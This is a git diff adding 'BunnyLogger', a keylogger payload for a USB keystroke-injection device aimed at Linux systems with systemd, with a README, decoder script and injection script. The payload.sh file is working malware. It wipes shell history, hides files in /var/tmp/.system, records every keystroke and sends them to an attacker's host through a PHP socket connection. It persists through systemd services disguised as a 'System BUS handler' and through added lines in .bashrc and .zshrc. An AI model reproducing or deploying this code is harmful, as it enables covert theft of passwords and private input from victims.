diff --git a/payloads/library/credentials/BunnyLogger/README.md b/payloads/library/credentials/BunnyLogger/README.md new file mode 100644 index 00000000..7c19270f --- /dev/null +++ b/payloads/library/credentials/BunnyLogger/README.md @@ -0,0 +1,62 @@ +## About: +* Title: BunnyLogger +* Description: Key logger which sends each and every key stroke of target remotely/locally. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Credentials +* Target: Unix-like operating systems with systemd. +* Attackmodes: HID, Storage + +## BunnyLogger: BunnyLogger is a Key Logger which captures every key stroke of traget and send them to attacker. + +### Features: +* Live keystroke capturing. +* Detailed key logs. +* Persistent +* Autostart payload on boot. + +### Workflow: +* Encoding payload and injecting on target's system. +* Checks whether internet is connected to the target system. +* If internet is connected then it sends raw keystrokes to attacker. +* Attacker processes raw keystrokes. + +### Changes to be made in payload.sh: +* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `11`. +* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `15`. + +### LED Status: +* `SETUP` : MAGENTA +* `ATTACK` : YELLOW +* `FINISH` : GREEN + +### Directory Structure of payload components: +| FileName | Directory | +| -------------- | ----------------------------- | +| payload.txt | /payload/switch1/ | +| payload.sh | /payload/ | +| xinput | /tools/ | + +### Usage: +1. Encode payload.txt and inject into target's system. +2. Start netcat listner on attacking system: + +* `nc -lvp > ` use this command to create new logfile with raw keystrokes. +* `nc -lvp >> ` use this command to append raw keystrokes to existing logfile. +3. Process raw keystrokes using BunnyLoggerDecoder utility: +``` +./bunnyLoggerDecoder +bunnyLoggerDecoder is used to decode raw key strokes acquired by bunnyLogger. + +Usage: +Decode captured log: [./bunnyLoggerDecoder -f -m -o ] + +Options: +-f Specify Log file. +-m Select Mode(normal|informative) +-o Specify Output file. +-h For this banner. +``` + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/credentials/BunnyLogger/bunnyLoggerDecoder b/payloads/library/credentials/BunnyLogger/bunnyLoggerDecoder new file mode 100644 index 00000000..c4aa994d --- /dev/null +++ b/payloads/library/credentials/BunnyLogger/bunnyLoggerDecoder @@ -0,0 +1,50 @@ +usage () { + echo -e "BunnyLoggerDecoder is used to decode raw key strokes acquired by BunnyLogger.\n" + echo -e "Usage: \nDecode captured log:\t[./bunnyLoggerDecoder -f -m -o ]"; + echo -e "\nOptions:" + echo -e "-f\tSpecify Log file." + echo -e "-m\tSelect Mode(normal|informative)" + echo -e "-o\tSpecify Output file." + echo -e "-h\tFor this banner." +} +while getopts o:m:f:h: flag +do + case "${flag}" in + o) output=$OPTARG ;; + m) mode=$OPTARG ;; + f) filename=$OPTARG ;; + h) help=$OPTARG ;; + *) + usage + exit 1 + esac +done + +if [ -z "$output" ] && [ -z "$filename" ]; then + usage + exit 1 +fi +if [ -z "$filename" ]; then + echo -e "BunnyLoggerDecoder: Missing option \"-f\"(Log file not specified).\nUse \"-h\" for more information." >&2 + exit 1 +fi +if [ -z "$output" ]; then + echo -e "BunnyLoggerDecoder: Missing option \"-o\"(Output file not specified).\nUse \"-h\" for help." >&2 + exit 1 +fi +if [ -z "$mode" ]; then + echo -e "BunnyLoggerDecoder: Missing option \"-m\"(Mode not specified).\nUse \"-h\" for help." >&2 + exit 1 +fi +if [ "$mode" != "informative" ] && [ "$mode" != "normal" ]; then + echo -e "BunnyLoggerDecoder: Invalid mode \"$mode\".\nUse \"-h\" for help." >&2 + exit 1 +fi +if [ "$mode" == "normal" ] ; then + awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename | grep press | awk '{print $4}' > $output + exit 1 +fi +if [ "$mode" == "informative" ] ; then + awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename > $output + exit 1 +fi diff --git a/payloads/library/credentials/BunnyLogger/payload.sh b/payloads/library/credentials/BunnyLogger/payload.sh new file mode 100644 index 00000000..90d1ea36 --- /dev/null +++ b/payloads/library/credentials/BunnyLogger/payload.sh @@ -0,0 +1,24 @@ +#!/bin/bash +unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE +mkdir /var/tmp/.system +lol=$(lsblk | grep 1.8G) +disk=$(echo $lol | awk '{print $1}') +mntt=$(lsblk | grep $disk | awk '{print $7}') +cp -r $mntt/tools/xinput /var/tmp/.system/ +echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys +chmod +x /var/tmp/.system/sys +chmod +x /var/tmp/.system/xinput +echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus +chmod +x /var/tmp/.system/systemBus +mkdir -p ~/.config/systemd/user +echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service +echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot +chmod +x /var/tmp/.system/reboot +echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service +systemctl --user daemon-reload +systemctl --user enable --now systemBUS.service +systemctl --user start --now systemBUS.service +systemctl --user enable --now reboot.service +systemctl --user start --now reboot.service +echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp +chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit diff --git a/payloads/library/credentials/BunnyLogger/payload.txt b/payloads/library/credentials/BunnyLogger/payload.txt new file mode 100644 index 00000000..f9c67969 --- /dev/null +++ b/payloads/library/credentials/BunnyLogger/payload.txt @@ -0,0 +1,56 @@ +# Title: BunnyLogger +# Description: Key logger which sends each and every key stroke of target remotely/locally. +# AUTHOR: drapl0n +# Version: 1.0 +# Category: Credentials +# Target: Unix-like operating systems with systemd. +# Attackmodes: HID, Storage + +LED SETUP +ATTACKMODE STORAGE HID +GET SWITCH_POSITION +LED ATTACK +Q DELAY 1000 +Q CTRL-ALT t +Q DELAY 1000 + +# [Prevent storing history] +Q STRING unset HISTFILE +Q ENTER +Q DELAY 200 + +# [Fetching BashBunny's block device] +Q STRING lol='$(lsblk | grep 1.8G)' +Q ENTER +Q DELAY 100 +Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)'' +Q ENTER +Q DELAY 200 + +# [Mounting BashBunny] +Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp +Q ENTER +Q DELAY 2000 +Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)'' +Q ENTER +Q DELAY 500 + +# [transfering payload script] +Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/ +Q ENTER +Q STRING chmod +x /tmp/payload.sh +Q ENTER +Q STRING /tmp/./payload.sh +Q ENTER +Q DELAY 2000 +Q STRING rm /tmp/payload.sh +Q ENTER +Q DELAY 500 + +# [Unmounting BashBunny] +Q STRING udisksctl unmount -b /dev/'$disk' +Q ENTER +Q DELAY 500 +Q STRING exit +Q ENTER +LED FINISH diff --git a/payloads/library/credentials/BunnyLogger/xinput b/payloads/library/credentials/BunnyLogger/xinput new file mode 100644 index 00000000..b9a54988 Binary files /dev/null and b/payloads/library/credentials/BunnyLogger/xinput differ